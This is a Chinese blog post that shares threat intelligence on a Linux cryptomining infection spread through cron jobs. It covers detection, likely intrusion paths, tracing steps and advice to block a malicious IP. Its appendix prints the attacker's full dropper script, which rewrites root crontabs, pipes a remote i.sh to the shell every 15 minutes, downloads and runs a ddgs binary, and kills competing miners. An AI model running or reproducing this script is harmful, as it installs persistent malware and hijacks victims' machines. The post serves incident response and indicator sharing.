linux定时任务被挖矿修改,Linux挖矿威胁情报分享(被植入计划任务)

最新推荐文章于 2024-04-17 20:08:39 发布
最新推荐文章于 2024-04-17 20:08:39 发布
阅读量413 收藏
点赞数
文章标签: linux定时任务被挖矿修改

0、前言

咳咳,安全设备直接拉黑该IP的出入,防患于未然嘛,下文进行意识流派分析总结。

1、如何发现异常

机子异常,首先是从虚拟机管理工具发现CPU资源异常报警,判断机子里存在恶意进程占用资源。

进去机子敲打命令top查看进程资源占用top10,发现异常进程

锁定进程工作目录与恶意程序位置

删文件与Kill进程,恶意进程均死灰复燃。

脑袋一拍,随机查看计划任务。

1、计划任务

crontab -l命令查看计划任务:

curl -fsSL http://149.56.106.215:8000/i.sh | sh

wget -q -O- http://149.56.106.215:8000/i.sh | sh

3、入侵路径

1、应用漏洞

2、组件漏洞

3、系统漏洞

4、爆破

5、等等

总之,攻击者拥有了root权限写了个计划任务,攻击入口需要对相关安全日志,计划任务日志,应用服务日志等日志进行审计分析

4、大致溯源思路

1、查看crontab的日志定位最初一条计划任务执行时间

2、锁定好被植入计划任务时间,查看其他日志

3、secure可以对定位的时间查看有无爆破和异常登陆

4、web日志可以查看定位时间段内有无异常请求

5、总结

这是个情报共享,重点是IP:

149.56.106.215

拉入黑名单吧,记得出入都拉黑

6、附件

样本都在下面了,有需要自己下把

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root

echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013

if [ ! -f "/tmp/ddgs.3013" ]; then

wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013

curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013

fi

chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill

ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill

ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill

ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill

ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill

ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill

#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

小弟埃尔文
关注
解决挖矿病毒(定时任务计划任务、系统定时器、定时启动、crontab、入侵)
墨痕诉清风的博客
05-15 7400
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 213
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
Linux 系统中的定时任务及延时任务_linux系统中,定时任务
最新发布
2301_78416732的博客
04-17 912
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
网站服务器被挖矿木马攻击,hosts文件、crontab定时任务被锁定解决办法
ljk15036029526的博客
06-05 720
登录服务器发现异常,hosts文件被清空锁定无法修改和crontab -l内容被清空后添加了一个定时任务,无法删除和修改(删除后马上自动恢复回来)。判断可能是黑客利用redis漏洞攻击了服务器,修改redis默认端口,配置redis复杂密码;判断为文件被加了隐藏权限,使用 lsattr 查看文件隐藏权限(文件被添加了 i a权限)找到运行的木马程序,删除木马程序目录。最好给服务器配置新的密钥文件。
linux防止不明文件启动,Linux服务器下如何创建文件防篡改规则
weixin_34635170的博客
04-29 384
我的服务器里有十几个网站,过不了一二天每个网站的首页都会被修改,加入一段隐藏框架的代码,这段代码连接的文件是有毒的.我在服务器上查了很多次都没有发现病毒.怎么清除啊…随着信息技术的飞速发展,信息安全事件已经深入到人们的方方面面.其中恶意代码是最重要的安全威胁之一,恶意代码要传播,必须要进行几个特定的操作以最典型的病毒和木马为例,其在传播的过程中,必然要改写其他可执行文件,以达到感染的目的。因此,如...
linux服务器被挖矿的解决办法
白雪少年
09-07 9525
一、前言 本周发现服务器很卡,明明什么实验也没跑(GPU是空的),然后重启后使用top指令后发现在自己账号下有个进程占用了所有的的cpu资源。然后使用top指令突然发现自己账号下有个进程将cpu的资源用完了,尝试使用kill命令终止该进程后发现几秒钟又重启,至此发现该进程是恶意进程,网上搜索后发现是一个挖矿的程序。直到问题,那就好办了。 二、解决办法 想法:由于直接kill定时任务的程序不行,那么应当先将定时任务删除。然后再去找到被修改的文件,要么删除,要么修改。 1. 阻断挖矿程序链接外网服务。 查看/e
【应急响应】-Linux
Zt_Zk的博客
08-27 829
发现问题要处置,遵循原则:百分百确认是非法文件,报备记录关停,摸棱两可找负责人确认,处置看沟通结果
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
Ubuntu16.04.01 kswapd0 进程占用cpu很高,中了亡命徒(Outlaw)挖矿B毒
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
05-17 908
top看一下主机的资源使用情况 kswapd0 是系统的虚拟内存管理程序,如果物理内存不够用,系统就会唤醒 kswapd0 进程,由 kswapd0 分配磁盘交换空间作缓存,因而占用大量的 CPU 资源。(copy) netstat -antlp|grep kswapd0 tcp 0 0 192.168.31.230:45832 45.9.148.58:80 ESTABLISHED 28315/kswapd0 netstat -antlp|grep -e
应急响应流程以及入侵排查
renyizou的博客
01-14 5819
归纳转载于: 应急响应的整体思路和基本流程 - FreeBuf网络安全行业门户不管是普通的企业,还是专业的安全厂商,都不可避免的需要掌握和运用好信息安全的知识、技能,以便在需要的时候,能够御敌千里。https://www.freebuf.com/articles/endpoint/192859.html 应急响应之windows入侵排查篇 - FreeBuf网络安全行业门户本文主要讨论windows被入侵后的排查思路。https://www.freebuf.com/articles/network/28
应急响应-挖矿木马-常规处置方法
qq_50765147的博客
02-15 522
挖矿木马常见的清除过程如下。
linux中crontab命令
挖矿的小强的博客
12-11 618
一、crond简介 crond是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与windows下的计划任务类似,当安装完成操作系统后,默认会安装此服务工具,并且会自动启动crond进程,crond进程每分钟会定期检查是否有要执行的任务,如果有要执行的任务,则自动执行该任务。 Linux下的任务调度分为两类,系统任务调度和用户任务调度。 系统任务调度:系统周期性所要执行...
记一次简单的挖矿病毒清除---实战
weixin_45300266的博客
01-09 2265
1、top 命令查看进程,cpu使用达到100% 此处尝试使用 kill -9+ 进程号 ,强制杀死进程后,病毒进程又重启,怀疑设置了定时任务 2、查看木马保存路径 通过ls -l proc/进程号/exe命令查看定位木马程序所在的目录,上图PID 为进程号 3、进入到木马文件所在路径 通过进程号定位到病毒文件后,进入到对应的目录 cd /usr/lib/updated ls 或者 ls -alh 4、使用删除命令 rm -rf + 病...
linux——挖矿程序处理
sunfragrence的博客
12-12 3643
记一次挖矿程序入侵以及解决实操! 1,过程记录 系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。 无论kill -9还是直接把系统中nanoWatch所对应的进程文件删除,一样会定时重启。 使用crontab -e查看当前系统的定时任务信息,如下: 显示定时从链接中下载文件,于是在浏览器中访问该地址,下载的文件截图如下: 很明显,这是一个恶意脚本,定时检查...
【解决】该任务映像已损坏或已篡改。(异常来自HRESULT:0x80041321)
luoyunhan0703的博客
10-06 1万+
把系统升级到Windows 10,体验了一番Windows 10。感觉不怎么好用退回到了Windows 7,发现我原来自定义的任务计划没有按时执行,于是打开任务计划,弹出了下面的对话框【该任务映像已损坏或已篡改。(异常来自HRESULT:0x80041321)】。 解决黄色别墅办法: 1. 以管理员身份运行命326电影网令提示符并执行命令 chcp 437 schtasks
linux计划任务问题:shell文件可以手动执行,计划任务一直失败!
炉火纯青
10-08 4826
今天的心情完全能用一万个草泥马来形容! 为了添加个计划任务,我特么从上午搞到凌晨现在! 没有办法,我刚接触linux,因为不熟,遇到各种坑,为了搞定它,研究了wdcp控制面板、linux常用命令、shell命令、vim命令、crontab任务计划命令。。。。。个中的艰辛真是有苦难言!我特么就感觉自己像爱迪生发明灯泡一样,进行了无数次尝试!$^%$%^&%^&*^*& 言归正传,最终我的问题的
Linux系统理论操作学习24】Linux挖矿程序清除,crontab指令查询及修改自动运行命令
呆呆象呆呆的博客
04-19 1850
场景 一半的cpu跑满,每次开机后都是这个情况 猜测 破解了root密码或者用户密码,运行了一个脚本挖矿传递数据 解决方案 一般都是通过crontab指令给你设置了一个定时任务所以我们通过crontab去找寻一下 然后把相关指令删掉 第一步查询是否有自动定时任务 输入如下指令,打开crontab查询有没有自动定时任务 crontab -l 可能会看到如下场景(这就说明你是有自动运行的文件的,下一步就是去看看这个文件是啥) 如果没有会是这样的 第二步关闭自动定时任务 首先输入 crontab -e 编
记一次遇到挖矿程序的经历
热门推荐
xzxmustwin的博客
05-30 1万+
就在几天前,遇到了一次挖矿程序偷偷装在ECS阿里云服务器上的经历。 那是一个风和日丽的上午,我和往常一样来到公司,倒杯水等待电脑打开,之后打开日常维护的几个系统。 结果其中有一个OA系统,发现无法正常打开。一开始我以为是网络问题,但是发现打开其他网站正常,于是登上服务器准备探个究竟。 登陆云服务器后,重启OA服务,发现报错,报错提示连接线程池连接不上。根据提示,怀疑是连不上部署在本地的数据服...
Linux环境下使用Webshell修改文件权限技巧
"Linux系统下,Webshell被用来非法修改文件权限的情况分析及防范措施" 在Linux系统中,网络安全是至关重要的。尤其是对于服务器管理来说,防止未经授权的访问和操作至关重要。"linux下用webshell对文件权限的修改....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值